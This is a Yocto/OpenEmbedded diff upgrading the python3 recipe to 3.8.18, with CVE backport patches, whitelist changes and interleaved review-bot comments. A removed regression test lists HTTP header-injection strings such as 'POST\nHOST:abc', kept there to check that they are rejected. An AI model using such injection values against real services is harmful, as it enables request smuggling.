@@ -185,25 +189,25 @@ index ede710e..bc81b0b 100644
+## Need to handle macos, vxworks and hurd special (?) :-/
+case ${target_os} in
+ darwin*)
-+ PLATFORM_TRIPLET=darwin
-+ ;;
++ PLATFORM_TRIPLET=darwin
++ ;;
+ hurd*)
-+ PLATFORM_TRIPLET=i386-gnu
-+ ;;
++ PLATFORM_TRIPLET=i386-gnu
++ ;;
+ vxworks*)
-+ PLATFORM_TRIPLET=vxworks
-+ ;;
++ PLATFORM_TRIPLET=vxworks
++ ;;
+ *)
+ if test "${target_cpu}" != "i686"; then
-+ PLATFORM_TRIPLET=${target_cpu}-${target_os}
-+ else
-+ PLATFORM_TRIPLET=i386-${target_os}
-+ fi
-+ ;;
-+esac
++ PLATFORM_TRIPLET=${target_cpu}-${target_os}
++ else
++ PLATFORM_TRIPLET=i386-${target_os}
++ fi
++ ;;
++esac
- if test x$PLATFORM_TRIPLET != x && test x$MULTIARCH != x; then
- if test x$PLATFORM_TRIPLET != x$MULTIARCH; then
+ if test x$PLATFORM_TRIPLET != xdarwin; then
+ MULTIARCH=$($CC --print-multiarch 2>/dev/null)
--
-2.24.1
+2.32.0
diff --git a/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
new file mode 100644
index 0000000000..a44d3396a6
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/0001-test_ctypes.test_find-skip-without-tools-sdk.patch
@@ -0,0 +1,33 @@
+From 7a2bddfa437be633bb6945d0e6b7d6f27da870ad Mon Sep 17 00:00:00 2001
+From: Tim Orling <timothy.t.orling@intel.com>
+Date: Fri, 18 Jun 2021 11:56:50 -0700
+Subject: [PATCH] test_ctypes.test_find: skip without tools-sdk
+
+These tests need full packagegroup-core-buildessential, the
+easiest way to dynamically check for that is looking for
+'tools-sdk' in IMAGE_FEATURES.
+
+Upstream-Status: Inappropriate [oe-specific]
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
+---
+ Lib/ctypes/test/test_find.py | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
+index 92ac184..0d009d1 100644
+--- a/Lib/ctypes/test/test_find.py
++++ b/Lib/ctypes/test/test_find.py
+@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
+ # LD_LIBRARY_PATH)
+ self.assertEqual(find_library(libname), 'lib%s.so' % libname)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_gcc(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
+ self.assertNotEqual(find_library('c'), None)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_ld(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
+ unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):
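Review bot: The description says the need for `tools-sdk` is checked dynamically, but both decorators are unconditional `@unittest.skip(...)`, so `test_find_library_with_gcc` and `test_find_library_with_ld` never run, even on images that ship the toolchain. Either reword the description to say the tests are always skipped, or condition the skip on the tool being present, for example `@unittest.skipUnless(shutil.which("gcc"), "Needs IMAGE_FEATURES += \"tools-sdk\"")`. That form assumes `shutil` is imported in test_find.py, which the hunk does not show.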
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
-From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001
-From: Mingli Yu <mingli.yu@windriver.com>
-Date: Mon, 5 Aug 2019 15:57:39 +0800
+From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
+From: Tim Orling <ticotimo@gmail.com>
+Date: Wed, 16 Jun 2021 07:49:52 -0700
Subject: [PATCH] test_locale.py: correct the test output format
Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
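Review bot: The refresh replaces the patch's `From:` and `Date:` header lines with the refresher's identity, while the second hunk still keeps `Signed-off-by: Mingli Yu` for the change submitted in the `Upstream-Status` pull request. Keep the original `From:` and `Date:` lines and record the refresh only through the added note and `Signed-off-by`. That preserves authorship and keeps the patch traceable to its upstream submission. The second hunk also drops the trailing `--` / `2.7.4` signature, which is harmless but makes the file end mid-hunk.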
Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+
+
+Refresh patch for upstream changes in 3.8.9
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
---
Lib/test/test_locale.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
-index e2c2178..558d63c 100644
+index 39091c0..5050f3d 100644
--- a/Lib/test/test_locale.py
+++ b/Lib/test/test_locale.py
-@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase):
+@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
self.skipTest('test needs Turkish locale')
loc = locale.getlocale(locale.LC_CTYPE)
if verbose:
- print('testing with %a' % (loc,), end=' ', flush=True)
+ print('testing with %a...' % (loc,), end=' ', flush=True)
- locale.setlocale(locale.LC_CTYPE, loc)
- self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE))
-
---
-2.7.4
-
+ try:
+ locale.setlocale(locale.LC_CTYPE, loc)
+ except locale.Error as exc:
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Mon, 29 Jun 2020 11:12:50 -0700
-Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
- IPv6Interface (GH-21033)
-
-The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
-of generating constant hash values of 32 and 128 respectively causing hash collisions.
-The fix uses the hash() function to generate hash values for the objects
-instead of XOR operation
-(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
-
-Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
-CVE: CVE-2020-14422
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Lib/ipaddress.py | 4 ++--
- Lib/test/test_ipaddress.py | 12 ++++++++++++
- .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst | 1 +
- 3 files changed, 15 insertions(+), 2 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-
-diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
-index 873c7644081af..a3a04f7f4b309 100644
---- a/Lib/ipaddress.py
-+++ b/Lib/ipaddress.py
-@@ -1370,7 +1370,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-@@ -2017,7 +2017,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
-index de77111705b69..2eba740e5e7a4 100644
---- a/Lib/test/test_ipaddress.py
-+++ b/Lib/test/test_ipaddress.py
-@@ -2053,6 +2053,18 @@ def testsixtofour(self):
- sixtofouraddr.sixtofour)
- self.assertFalse(bad_addr.sixtofour)
-
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV4HashIsNotConstant(self):
-+ ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
-+ ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
-+ self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
-+
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV6HashIsNotConstant(self):
-+ ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
-+ ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
-+ self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
-+
-
- if __name__ == '__main__':
- unittest.main()
-diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-new file mode 100644
-index 0000000000000..1380b31fbe9f4
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-@@ -0,0 +1 @@
-+The __hash__() methods of ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Sat, 18 Jul 2020 13:39:12 -0700
-Subject: [PATCH] bpo-39603: Prevent header injection in http methods
- (GH-18485)
-
-reject control chars in http method in http.client.putrequest to prevent http header injection
-(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
-
-Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
-CVE: CVE-2020-26116
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
----
- Lib/http/client.py | 15 +++++++++++++
- Lib/test/test_httplib.py | 22 +++++++++++++++++++
- .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst | 2 ++
- 3 files changed, 39 insertions(+)
- create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-
-diff --git a/Lib/http/client.py b/Lib/http/client.py
-index 019380a720318..c2ad0471bfee5 100644
---- a/Lib/http/client.py
-+++ b/Lib/http/client.py
-@@ -147,6 +147,10 @@
- # _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
- # We are more lenient for assumed real world compatibility purposes.
-
-+# These characters are not allowed within HTTP method names
-+# to prevent http header injection.
-+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
-+
- # We always set the Content-Length header for these methods because some
- # servers will otherwise respond with a 411
- _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
-@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
- else:
- raise CannotSendRequest(self.__state)
-
-+ self._validate_method(method)
-+
- # Save the method for use later in the response phase
- self._method = method
-
-@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
- # ASCII also helps prevent CVE-2019-9740.
- return request.encode('ascii')
-
-+ def _validate_method(self, method):
-+ """Validate a method name for putrequest."""
-+ # prevent http header injection
-+ match = _contains_disallowed_method_pchar_re.search(method)
-+ if match:
-+ raise ValueError(
-+ f"method can't contain control characters. {method!r} "
-+ f"(found at least {match.group()!r})")
-+
- def _validate_path(self, url):
- """Validate a url for putrequest."""
- # Prevent CVE-2019-9740.
-diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
-index 8f0e27a1fb836..5a5fcecbc9c15 100644
---- a/Lib/test/test_httplib.py
-+++ b/Lib/test/test_httplib.py
-@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
- self.assertEqual(lines[3], "header: Second: val2")
-
-
-+class HttpMethodTests(TestCase):
-+ def test_invalid_method_names(self):
-+ methods = (
-+ 'GET\r',
-+ 'POST\n',
-+ 'PUT\n\r',
-+ 'POST\nValue',
-+ 'POST\nHOST:abc',
-+ 'GET\nrHost:abc\n',
-+ 'POST\rRemainder:\r',
-+ 'GET\rHOST:\n',
-+ '\nPUT'
-+ )
-+
-+ for method in methods:
-+ with self.assertRaisesRegex(
-+ ValueError, "method can't contain control characters"):
-+ conn = client.HTTPConnection('example.com')
-+ conn.sock = FakeSocket(None)
-+ conn.request(method=method, url="/")
-+
-+
- class TransferEncodingTest(TestCase):
- expected_body = b"It's just a flesh wound"
-
-diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-new file mode 100644
-index 0000000000000..990affc3edd9d
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-@@ -0,0 +1,2 @@
-+Prevent http header injection by rejecting control characters in
-+http.client.putrequest(...).
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
-From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
-Date: Tue, 6 Oct 2020 05:38:54 -0700
-Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
- in the CJK codec tests (GH-22566) (GH-22577)
-
-(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
-CVE: CVE-2020-27619
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- Lib/test/multibytecodec_support.py | 22 +++++++------------
- .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst | 1 +
- 2 files changed, 9 insertions(+), 14 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-
-diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
-index cca8af67d6d1d..f76c0153f5ecf 100644
---- a/Lib/test/multibytecodec_support.py
-+++ b/Lib/test/multibytecodec_support.py
-@@ -305,29 +305,23 @@ def test_mapping_file(self):
- self._test_mapping_file_plain()
-
- def _test_mapping_file_plain(self):
-- unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
-+ def unichrs(s):
-+ return ''.join(chr(int(x, 16)) for x in s.split('+'))
-+
- urt_wa = {}
-
- with self.open_mapping_file() as f:
- for line in f:
- if not line:
- break
-- data = line.split('#')[0].strip().split()
-+ data = line.split('#')[0].split()
- if len(data) != 2:
- continue
-
-- csetval = eval(data[0])
-- if csetval <= 0x7F:
-- csetch = bytes([csetval & 0xff])
-- elif csetval >= 0x1000000:
-- csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
-- ((csetval >> 8) & 0xff), (csetval & 0xff)])
-- elif csetval >= 0x10000:
-- csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
-- (csetval & 0xff)])
-- elif csetval >= 0x100:
-- csetch = bytes([(csetval >> 8), (csetval & 0xff)])
-- else:
-+ if data[0][:2] != '0x':
-+ self.fail(f"Invalid line: {line!r}")
-+ csetch = bytes.fromhex(data[0][2:])
-+ if len(csetch) == 1 and 0x80 <= csetch[0]:
- continue
-
- unich = unichrs(data[1])
-diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-new file mode 100644
-index 0000000000000..4f9782f1c85af
---- /dev/null
-+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-@@ -0,0 +1 @@
-+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.
diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
+From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
+From: "Miss Islington (bot)"
+ <31488909+miss-islington@users.noreply.github.com>
+Date: Sun, 13 Nov 2022 11:00:25 -0800
+Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
+ must begin with an alphabetical ASCII character. (GH-99421)
+
+Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
+
+RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
+RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
+
+The WHATWG URL spec defines a scheme like this:
+`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
+(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
+
+Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
+CVE: CVE-2023-24329
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ Lib/test/test_urlparse.py | 18 ++++++++++++++++++
+ Lib/urllib/parse.py | 2 +-
+ ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst | 2 ++
+ 3 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+
+diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
+index 0ad3bf1..e1aa913 100644
+--- a/Lib/test/test_urlparse.py
++++ b/Lib/test/test_urlparse.py
+@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
+ with self.assertRaises(ValueError):
+ p.port
+
++ def test_attributes_bad_scheme(self):
++ """Check handling of invalid schemes."""
++ for bytes in (False, True):
++ for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
++ for scheme in (".", "+", "-", "0", "http&", "६http"):
++ with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
++ url = scheme + "://www.example.net"
++ if bytes:
++ if url.isascii():
++ url = url.encode("ascii")
++ else:
++ continue
++ p = parse(url)
++ if bytes:
++ self.assertEqual(p.scheme, b"")
++ else:
++ self.assertEqual(p.scheme, "")
++
+ def test_attributes_without_netloc(self):
+ # This example is straight from RFC 3261. It looks like it
+ # should allow the username, hostname, and port to be filled
+diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
+index 979e6d2..2e7a3e2 100644
+--- a/Lib/urllib/parse.py
++++ b/Lib/urllib/parse.py
+@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
+ clear_cache()
+ netloc = query = fragment = ''
+ i = url.find(':')
+- if i > 0:
++ if i > 0 and url[0].isascii() and url[0].isalpha():
+ if url[:i] == 'http': # optimize the common case
+ url = url[i+1:]
+ if url[:2] == '//':
+diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+new file mode 100644
+index 0000000..0a06e7c
+--- /dev/null
++++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+@@ -0,0 +1,2 @@
++Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
++with a digit, a plus sign, or a minus sign to be parsed incorrectly.
+--
+2.25.1
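Review bot: The guard added to urlsplit, `if i > 0 and url[0].isascii() and url[0].isalpha():`, only rejects a non-alphabetic first character, so a URL with leading whitespace or control characters still comes back with an empty scheme rather than being normalised. `test_attributes_bad_scheme` has no such case. Callers that filter on the parsed scheme or host depend on that normalisation, so it is worth confirming that the 3.8.18 base already strips leading C0 control and space characters, and recording that in the patch header. In the test, the loop variable `bytes` shadows the builtin; `use_bytes` would read better if this were not a verbatim backport. The body of urlsplit continues outside the inner hunk.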
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.8.11/Makefile.pre.in
+===================================================================
+--- Python-3.8.11.orig/Makefile.pre.in
++++ Python-3.8.11/Makefile.pre.in
+@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
+ unittest unittest/test unittest/test/testmock \
+ venv venv/scripts venv/scripts/common venv/scripts/posix \
+ curses pydoc_data
+-libinstall: build_all $(srcdir)/Modules/xxmodule.c
++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
+ @for i in $(SCRIPTDIR) $(LIBDEST); \
+ do \
+ if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
"rdepends": [
"core"
],
- "files": [],
+ "files": [
+ "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
+ ],
"cached": []
},
"distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index 1d0b4cdb77..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
SUMMARY = "The Python Programming Language"
HOMEPAGE = "http://www.python.org"
-LICENSE = "PSFv2"
+DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
+LICENSE = "PSF-2.0 & BSD-0-Clause"
SECTION = "devel/python"
-LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://run-ptest \
@@ -32,10 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://0001-configure.ac-fix-LIBPL.patch \
file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
- file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \
- file://CVE-2020-14422.patch \
- file://CVE-2020-26116.patch \
- file://CVE-2020-27619.patch \
+ file://makerace.patch \
+ file://CVE-2023-24329.patch \
"
SRC_URI_append_class-native = " \
@@ -44,19 +43,26 @@ SRC_URI_append_class-native = " \
file://0001-Don-t-search-system-for-headers-libraries.patch \
"
-SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67"
-SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df"
+SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
+SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
# exclude pre-releases for both python 2.x and 3.x
UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
CVE_PRODUCT = "python"
+# Upstream consider this expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2007-4559"
# This is not exploitable when glibc has CVE-2016-10739 fixed.
CVE_CHECK_WHITELIST += "CVE-2019-18348"
# This is windows only issue.
-CVE_CHECK_WHITELIST += "CVE-2020-15523"
+CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
+# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
+# The module will be removed in the future and flaws documented.
+CVE_CHECK_WHITELIST += "CVE-2015-20107"
+# Not an issue, in fact expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2023-36632"
PYTHON_MAJMIN = "3.8"
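Review bot: The new `CVE_CHECK_WHITELIST` entries for CVE-2007-4559 and CVE-2015-20107 silence the scanner for behaviour that stays in the shipped interpreter, and the comments above them do not tell an image maintainer what remains exposed. I would expand them, e.g. `# tarfile extraction of untrusted archives is not fixed upstream; callers must validate member paths` and `# mailcap still ships; never pass untrusted input to mailcap.findmatch()`. The CVE-2023-36632 entry has the same gap: `# Not an issue, in fact expected behaviour` gives no pointer to where upstream stated that, so the decision cannot be re-checked later.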
@@ -73,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
-DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2"
+DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
DEPENDS_append_class-target = " python3-native"
DEPENDS_append_class-nativesdk = " python3-native"
@@ -309,11 +315,8 @@ do_create_manifest() {
}
# bitbake python -c create_manifest
-addtask do_create_manifest
-
# Make sure we have native python ready when we create a new manifest
-do_create_manifest[depends] += "${PN}:do_prepare_recipe_sysroot"
-do_create_manifest[depends] += "${PN}:do_patch"
+addtask do_create_manifest after do_patch do_prepare_recipe_sysroot
# manual dependency additions
RRECOMMENDS_${PN}-core_append_class-nativesdk = " nativesdk-python3-modules"
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
FILES_libpython3 = "${libdir}/libpython*.so.*"
FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
INSANE_SKIP_${PN}-dev += "dev-elf"
+INSANE_SKIP_${PN}-ptest += "dev-deps"
# catch all the rest (unsorted)
PACKAGES += "${PN}-misc"
@@ -350,10 +354,16 @@ FILES_${PN}-man = "${datadir}/man"
# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
RDEPENDS_libpython3_append_libc-glibc = " libgcc"
RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
-RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed"
+RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
RDEPENDS_${PN}-dev = ""
RDEPENDS_${PN}-tests_append_class-target = " bash"
RDEPENDS_${PN}-tests_append_class-nativesdk = " bash"
+
+# Python's tests contain large numbers of files we don't need in the recipe sysroots
+SYSROOT_PREPROCESS_FUNCS += " py3_sysroot_cleanup"
+py3_sysroot_cleanup () {
+ rm -rf ${SYSROOT_DESTDIR}${libdir}/python${PYTHON_MAJMIN}/test
+}
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
-PACKAGECONFIG ??= "fdt alsa kvm"
